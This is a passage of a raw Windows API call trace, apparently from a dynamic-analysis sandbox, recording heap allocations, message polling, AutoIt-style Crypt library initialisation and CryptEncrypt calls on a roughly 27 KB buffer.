0 [0043.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0043.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0043.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0043.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0043.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0043.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0043.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0043.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0043.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0043.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0043.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0043.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0043.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0043.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0043.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0043.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0043.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0043.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0043.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0043.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0043.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0043.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0043.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0043.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0043.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0043.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0043.593] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0043.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0043.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0043.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0043.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0043.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0043.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0043.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0043.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0043.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0043.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0043.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0043.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0043.594] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0043.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c7f0 [0043.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0043.594] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0043.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0043.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0043.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0043.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0043.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0043.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0043.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0043.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0043.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0043.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0043.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0043.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0043.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0043.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0043.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0043.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0043.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0043.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0043.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0043.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0043.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0043.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0043.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0043.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0043.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0043.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0043.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0043.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0043.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0043.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0043.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0043.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0043.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0043.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0043.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0043.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0043.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0043.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0043.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0043.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0043.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0043.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0043.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0043.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0043.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0043.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0043.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0043.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0043.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0043.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0043.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0043.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0043.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0043.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0043.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0043.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0043.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0043.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0043.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0043.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0043.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0043.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0043.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0043.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0043.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0043.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0043.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0043.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0043.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0043.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0043.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0043.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0043.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0043.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0043.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0043.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0043.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0043.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0043.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0043.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0043.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0043.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0043.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0043.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0043.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0043.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0043.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0043.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0043.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0043.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0043.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0043.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0043.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0043.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0043.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0043.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0043.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0043.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0043.597] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0043.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0043.597] CryptGetKeyParam (in: hKey=0x7c2200, dwParam=0x7, pbData=0x7da3f8, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da3f8*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0043.597] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0043.597] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0043.597] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.597] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.597] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.597] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0043.597] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.597] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.597] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0043.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0043.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0043.597] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.597] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0043.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0043.598] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0043.598] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0043.598] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.598] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0043.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0043.598] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0043.598] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0043.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0043.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0043.598] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.598] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.598] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.598] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0043.598] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.598] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0043.598] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0043.599] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.599] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x6c58, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x6c60) returned 1 [0043.599] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.599] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0043.599] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.599] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.599] CharLowerBuffW (in: lpsz="byte[27745]", cchLength=0xb | out: lpsz="byte[27745]") returned 0xb [0043.599] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.600] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.600] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0043.600] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0043.602] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.602] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xad6538*, pdwDataLen=0x6ae220*=0x6c58, dwBufLen=0x6c60 | out: pbData=0xad6538*, pdwDataLen=0x6ae220*=0x6c60) returned 1 [0043.602] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.602] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0043.602] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.603] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.603] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.603] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.603] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0043.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0043.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0043.603] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.603] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0043.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0043.604] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0043.604] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0043.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0043.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0043.604] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.604] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0043.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: 